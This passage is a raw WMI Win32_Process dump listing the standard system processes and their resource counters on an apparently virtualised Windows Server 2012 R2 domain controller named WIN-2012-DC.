4317184\nWS : 217088\nPath :\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"292\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"292\"\nCaption : csrss.exe\nCommandLine :\nCreationClassName : Win32_Process\nCreationDate : 20170712121426.081561-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : csrss.exe\nExecutablePath :\nExecutionState :\nHandle : 292\nHandleCount : 180\nInstallDate :\nKernelModeTime : 5000000\nMaximumWorkingSetSize :\nMinimumWorkingSetSize :\nName : csrss.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 14627\nOtherTransferCount : 839996\nPageFaults : 2986\nPageFileUsage : 1552\nParentProcessId : 284\nPeakPageFileUsage : 1552\nPeakVirtualSize : 45264896\nPeakWorkingSetSize : 3352\nPriority : 13\nPrivatePageCount : 1589248\nProcessId : 292\nQuotaNonPagedPoolUsage : 11\nQuotaPagedPoolUsage : 116\nQuotaPeakNonPagedPoolUsage : 13\nQuotaPeakPagedPoolUsage : 122\nReadOperationCount : 64\nReadTransferCount : 55340\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 8\nUserModeTime : 781250\nVirtualSize : 44339200\nWindowsVersion : 6.3.9600\nWorkingSetSize : 1380352\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : csrss.exe\nHandles : 180\nVM : 44339200\nWS : 1380352\nPath :\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"344\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"344\"\nCaption : csrss.exe\nCommandLine :\nCreationClassName : Win32_Process\nCreationDate : 20170712121426.456426-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : csrss.exe\nExecutablePath :\nExecutionState :\nHandle : 344\nHandleCount : 185\nInstallDate :\nKernelModeTime : 3906250\nMaximumWorkingSetSize :\nMinimumWorkingSetSize :\nName : csrss.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 3137\nOtherTransferCount : 69162\nPageFaults : 64988\nPageFileUsage : 1496\nParentProcessId : 336\nPeakPageFileUsage : 1552\nPeakVirtualSize : 85655552\nPeakWorkingSetSize : 35324\nPriority : 13\nPrivatePageCount : 1531904\nProcessId : 344\nQuotaNonPagedPoolUsage : 16\nQuotaPagedPoolUsage : 162\nQuotaPeakNonPagedPoolUsage : 17\nQuotaPeakPagedPoolUsage : 192\nReadOperationCount : 33315\nReadTransferCount : 1039202\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 10\nUserModeTime : 312500\nVirtualSize : 71077888\nWindowsVersion : 6.3.9600\nWorkingSetSize : 23592960\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : csrss.exe\nHandles : 185\nVM : 71077888\nWS : 23592960\nPath :\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"352\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"352\"\nCaption : wininit.exe\nCommandLine : wininit.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121426.456426-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : wininit.exe\nExecutablePath : C:\\Windows\\system32\\wininit.exe\nExecutionState :\nHandle : 352\nHandleCount : 79\nInstallDate :\nKernelModeTime : 312500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : wininit.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 1036\nOtherTransferCount : 2788\nPageFaults : 1112\nPageFileUsage : 728\nParentProcessId : 284\nPeakPageFileUsage : 956\nPeakVirtualSize : 45092864\nPeakWorkingSetSize : 3524\nPriority : 13\nPrivatePageCount : 745472\nProcessId : 352\nQuotaNonPagedPoolUsage : 8\nQuotaPagedPoolUsage : 88\nQuotaPeakNonPagedPoolUsage : 10\nQuotaPeakPagedPoolUsage : 90\nReadOperationCount : 1\nReadTransferCount : 6656\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 1\nUserModeTime : 156250\nVirtualSize : 41603072\nWindowsVersion : 6.3.9600\nWorkingSetSize : 294912\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : wininit.exe\nHandles : 79\nVM : 41603072\nWS : 294912\nPath : C:\\Windows\\system32\\wininit.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"380\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"380\"\nCaption : winlogon.exe\nCommandLine : winlogon.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121426.472426-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : winlogon.exe\nExecutablePath : C:\\Windows\\system32\\winlogon.exe\nExecutionState :\nHandle : 380\nHandleCount : 156\nInstallDate :\nKernelModeTime : 937500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : winlogon.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 1203\nOtherTransferCount : 144580\nPageFaults : 9367\nPageFileUsage : 1200\nParentProcessId : 336\nPeakPageFileUsage : 2624\nPeakVirtualSize : 59760640\nPeakWorkingSetSize : 8708\nPriority : 13\nPrivatePageCount : 1228800\nProcessId : 380\nQuotaNonPagedPoolUsage : 9\nQuotaPagedPoolUsage : 117\nQuotaPeakNonPagedPoolUsage : 14\nQuotaPeakPagedPoolUsage : 117\nReadOperationCount : 3\nReadTransferCount : 144816\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 2\nUserModeTime : 0\nVirtualSize : 58621952\nWindowsVersion : 6.3.9600\nWorkingSetSize : 8896512\nWriteOperationCount : 1\nWriteTransferCount : 160\nPSComputerName : WIN-2012-DC\nProcessName : winlogon.exe\nHandles : 156\nVM : 58621952\nWS : 8896512\nPath : C:\\Windows\\system32\\winlogon.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"440\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"440\"\nCaption : services.exe\nCommandLine :\nCreationClassName : Win32_Process\nCreationDate : 20170712121426.721992-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : services.exe\nExecutablePath :\nExecutionState :\nHandle : 440\nHandleCount : 227\nInstallDate :\nKernelModeTime : 2187500\nMaximumWorkingSetSize :\nMinimumWorkingSetSize :\nName : services.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 2885\nOtherTransferCount : 64186\nPageFaults : 4054\nPageFileUsage : 2156\nParentProcessId : 352\nPeakPageFileUsage : 2920\nPeakVirtualSize : 29523968\nPeakWorkingSetSize : 5740\nPriority : 9\nPrivatePageCount : 2207744\nProcessId : 440\nQuotaNonPagedPoolUsage : 10\nQuotaPagedPoolUsage : 91\nQuotaPeakNonPagedPoolUsage : 17\nQuotaPeakPagedPoolUsage : 92\nReadOperationCount : 6\nReadTransferCount : 243828\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 4\nUserModeTime : 2343750\nVirtualSize : 21508096\nWindowsVersion : 6.3.9600\nWorkingSetSize : 2891776\nWriteOperationCount : 1\nWriteTransferCount : 160\nPSComputerName : WIN-2012-DC\nProcessName : services.exe\nHandles : 227\nVM : 21508096\nWS : 2891776\nPath :\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"448\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"448\"\nCaption : lsass.exe\nCommandLine : C:\\Windows\\system32\\lsass.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121426.768868-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : lsass.exe\nExecutablePath : C:\\Windows\\system32\\lsass.exe\nExecutionState :\nHandle : 448\nHandleCount : 1276\nInstallDate :\nKernelModeTime : 59062500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : lsass.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 42608\nOtherTransferCount : 4026319\nPageFaults : 38862\nPageFileUsage : 37588\nParentProcessId : 352\nPeakPageFileUsage : 64580\nPeakVirtualSize : 1225867264\nPeakWorkingSetSize : 66640\nPriority : 9\nPrivatePageCount : 38490112\nProcessId : 448\nQuotaNonPagedPoolUsage : 123\nQuotaPagedPoolUsage : 181\nQuotaPeakNonPagedPoolUsage : 148\nQuotaPeakPagedPoolUsage : 187\nReadOperationCount : 7663\nReadTransferCount : 73721023\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 27\nUserModeTime : 37656250\nVirtualSize : 1202966528\nWindowsVersion : 6.3.9600\nWorkingSetSize : 27443200\nWriteOperationCount : 1182\nWriteTransferCount : 1727779\nPSComputerName : WIN-2012-DC\nProcessName : lsass.exe\nHandles : 1276\nVM : 1202966528\nWS : 27443200\nPath : C:\\Windows\\system32\\lsass.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"572\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"572\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k DcomLaunch\nCreationClassName : Win32_Process\nCreationDate : 20170712121428.268496-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 572\nHandleCount : 367\nInstallDate :\nKernelModeTime : 1562500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 532\nOtherTransferCount : 22332\nPageFaults : 5374\nPageFileUsage : 3224\nParentProcessId : 440\nPeakPageFileUsage : 8228\nPeakVirtualSize : 50991104\nPeakWorkingSetSize : 12264\nPriority : 8\nPrivatePageCount : 3301376\nProcessId : 572\nQuotaNonPagedPoolUsage : 15\nQuotaPagedPoolUsage : 173\nQuotaPeakNonPagedPoolUsage : 20\nQuotaPeakPagedPoolUsage : 174\nReadOperationCount : 2\nReadTransferCount : 4608\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 8\nUserModeTime : 1250000\nVirtualSize : 47263744\nWindowsVersion : 6.3.9600\nWorkingSetSize : 6938624\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : svchost.exe\nHandles : 367\nVM : 47263744\nWS : 6938624\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"600\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"600\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k RPCSS\nCreationClassName : Win32_Process\nCreationDate : 20170712121428.502822-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 600\nHandleCount : 356\nInstallDate :\nKernelModeTime : 6093750\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 1409\nOtherTransferCount : 68138\nPageFaults : 4600\nPageFileUsage : 3216\nParentProcessId : 440\nPeakPageFileUsage : 4380\nPeakVirtualSize : 32124928\nPeakWorkingSetSize : 7540\nPriority : 8\nPrivatePageCount : 3293184\nProcessId : 600\nQuotaNonPagedPoolUsage : 19\nQuotaPagedPoolUsage : 69\nQuotaPeakNonPagedPoolUsage : 26\nQuotaPeakPagedPoolUsage : 71\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 9\nUserModeTime : 10312500\nVirtualSize : 28418048\nWindowsVersion : 6.3.9600\nWorkingSetSize : 3805184\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : svchost.exe\nHandles : 356\nVM : 28418048\nWS : 3805184\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"716\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"716\"\nCaption : dwm.exe\nCommandLine : \"dwm.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712121428.721530-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : dwm.exe\nExecutablePath : C:\\Windows\\system32\\dwm.exe\nExecutionState :\nHandle : 716\nHandleCount : 174\nInstallDate :\nKernelModeTime : 6562500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : dwm.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 270\nOtherTransferCount : 1874\nPageFaults : 134538\nPageFileUsage : 25236\nParentProcessId : 380\nPeakPageFileUsage : 27916\nPeakVirtualSize : 151556096\nPeakWorkingSetSize : 64424\nPriority : 13\nPrivatePageCount : 25841664\nProcessId : 716\nQuotaNonPagedPoolUsage : 18\nQuotaPagedPoolUsage : 249\nQuotaPeakNonPagedPoolUsage : 20\nQuotaPeakPagedPoolUsage : 285\nReadOperationCount : 1\nReadTransferCount : 60\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 7\nUserModeTime : 6250000\nVirtualSize : 135200768\nWindowsVersion : 6.3.9600\nWorkingSetSize : 48685056\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : dwm.exe\nHandles : 174\nVM : 135200768\nWS : 48685056\nPath : C:\\Windows\\system32\\dwm.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"744\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"744\"\nCaption : VBoxService.exe\nCommandLine : C:\\Windows\\System32\\VBoxService.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121428.800220-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : VBoxService.exe\nExecutablePath : C:\\Windows\\System32\\VBoxService.exe\nExecutionState :\nHandle : 744\nHandleCount : 138\nInstallDate :\nKernelModeTime : 3437500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : VBoxService.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 360692\nOtherTransferCount : 9815652\nPageFaults : 65824\nPageFileUsage : 1880\nParentProcessId : 440\nPeakPageFileUsage : 1972\nPeakVirtualSize : 60723200\nPeakWorkingSetSize : 4924\nPriority : 8\nPrivatePageCount : 1925120\nProcessId : 744\nQuotaNonPagedPoolUsage : 10\nQuotaPagedPoolUsage : 98\nQuotaPeakNonPagedPoolUsage : 11\nQuotaPeakPagedPoolUsage : 99\nReadOperationCount : 1339\nReadTransferCount : 5356\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 10\nUserModeTime : 156250\nVirtualSize : 59535360\nWindowsVersion : 6.3.9600\nWorkingSetSize : 2777088\nWriteOperationCount : 1339\nWriteTransferCount : 21424\nPSComputerName : WIN-2012-DC\nProcessName : VBoxService.exe\nHandles : 138\nVM : 59535360\nWS : 2777088\nPath : C:\\Windows\\System32\\VBoxService.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"828\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"828\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted\nCreationClassName : Win32_Process\nCreationDate : 20170712121428.974985-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\System32\\svchost.exe\nExecutionState :\nHandle : 828\nHandleCount : 470\nInstallDate :\nKernelModeTime : 2343750\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 9748\nOtherTransferCount : 195486\nPageFaults : 14264\nPageFileUsage : 11492\nParentProcessId : 440\nPeakPageFileUsage : 12628\nPeakVirtualSize : 417185792\nPeakWorkingSetSize : 18704\nPriority : 8\nPrivatePageCount : 11767808\nProcessId : 828\nQuotaNonPagedPoolUsage : 21\nQuotaPagedPoolUsage : 100\nQuotaPeakNonPagedPoolUsage : 90\nQuotaPeakPagedPoolUsage : 775\nReadOperationCount : 571\nReadTransferCount : 18125696\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 14\nUserModeTime : 3750000\nVirtualSize : 62521344\nWindowsVersion : 6.3.9600\nWorkingSetSize : 10477568\nWriteOperationCount : 1612\nWriteTransferCount : 21053256\nPSComputerName : WIN-2012-DC\nProcessName : svchost.exe\nHandles : 470\nVM : 62521344\nWS : 10477568\nPath : C:\\Windows\\System32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"868\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"868\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k netsvcs\nCreationClassName : Win32_Process\nCreationDate : 20170712121429.077424-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 868\nHandleCount : 1485\nInstallDate :\nKernelModeTime : 1415468750\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 16223299\nOtherTransferCount : 4483312296\nPageFaults : 7083952\nPageFileUsage : 38180\nParentProcessId : 440\nPeakPageFileUsage : 529172\nPeakVirtualSize : 1013297152\nPeakWorkingSetSize : 503340\nPriority : 8\nPrivatePageCount : 39096320\nProcessId : 868\nQuotaNonPagedPoolUsage : 55\nQuotaPagedPoolUsage : 308\nQuotaPeakNonPagedPoolUsage : 1411\nQuotaPeakPagedPoolUsage : 545\nReadOperationCount : 635856\nReadTransferCount : 4894533179\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 37\nUserModeTime : 2435000000\nVirtualSize : 701550592\nWindowsVersion : 6.3.9600\nWorkingSetSize : 39227392\nWriteOperationCount : 66889\nWriteTransferCount : 6173042829\nPSComputerName : WIN-2012-DC\nProcessName : svchost.exe\nHandles : 1485\nVM : 701550592\nWS : 39227392\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"916\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"916\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k LocalService\nCreationClassName : Win32_Process\nCreationDate : 20170712121429.146469-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 916\nHandleCount : 437\nInstallDate :\nKernelModeTime : 937500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 6327\nOtherTransferCount : 354042\nPageFaults : 4821\nPageFileUsage : 4896\nParentProcessId : 440\nPeakPageFileUsage : 5260\nPeakVirtualSize : 85487616\nPeakWorkingSetSize : 10468\nPriority : 8\nPrivatePageCount : 5013504\nProcessId : 916\nQuotaNonPagedPoolUsage : 25\nQuotaPagedPoolUsage : 171\nQuotaPeakNonPagedPoolUsage : 31\nQuotaPeakPagedPoolUsage : 178\nReadOperationCount : 57\nReadTransferCount : 7766\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 16\nUserModeTime : 1718750\nVirtualSize : 81354752\nWindowsVersion : 6.3.9600\nWorkingSetSize : 6328320\nWriteOperationCount : 12\nWriteTransferCount : 996\nPSComputerName : WIN-2012-DC\nProcessName : svchost.exe\nHandles : 437\nVM : 81354752\nWS : 6328320\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"976\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"976\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k NetworkService\nCreationClassName : Win32_Process\nCreationDate : 20170712121429.232454-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 976\nHandleCount : 752\nInstallDate :\nKernelModeTime : 27031250\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 95839\nOtherTransferCount : 6023602\nPageFaults : 68229\nPageFileUsage : 10644\nParentProcessId : 440\nPeakPageFileUsage : 28680\nPeakVirtualSize : 1432371200\nPeakWorkingSetSize : 37824\nPriority : 8\nPrivatePageCount : 10899456\nProcessId : 976\nQuotaNonPagedPoolUsage : 60\nQuotaPagedPoolUsage : 199\nQuotaPeakNonPagedPoolUsage : 635\nQuotaPeakPagedPoolUsage : 681\nReadOperationCount : 2841\nReadTransferCount : 24656487\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 18\nUserModeTime : 20781250\nVirtualSize : 1193250816\nWindowsVersion : 6.3.9600\nWorkingSetSize : 10711040\nWriteOperationCount : 47699\nWriteTransferCount : 240781127\nPSComputerName : WIN-2012-DC\nProcessName : svchost.exe\nHandles : 752\nVM : 1193250816\nWS : 10711040\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"432\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"432\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork\nCreationClassName : Win32_Process\nCreationDate : 20170712121429.404423-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 432\nHandleCount : 372\nInstallDate :\nKernelModeTime : 312500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 3442\nOtherTransferCount : 148426\nPageFaults : 8106\nPageFileUsage : 6340\nParentProcessId : 440\nPeakPageFileUsage : 6732\nPeakVirtualSize : 51179520\nPeakWorkingSetSize : 10496\nPriority : 8\nPrivatePageCount : 6492160\nProcessId : 432\nQuotaNonPagedPoolUsage : 33\nQuotaPagedPoolUsage : 87\nQuotaPeakNonPagedPoolUsage : 36\nQuotaPeakPagedPoolUsage : 89\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 18\nUserModeTime : 1718750\nVirtualSize : 50114560\nWindowsVersion : 6.3.9600\nWorkingSetSize : 4313088\nWriteOperationCount : 1\nWriteTransferCount : 32768\nPSComputerName : WIN-2012-DC\nProcessName : svchost.exe\nHandles : 372\nVM : 50114560\nWS : 4313088\nPath : 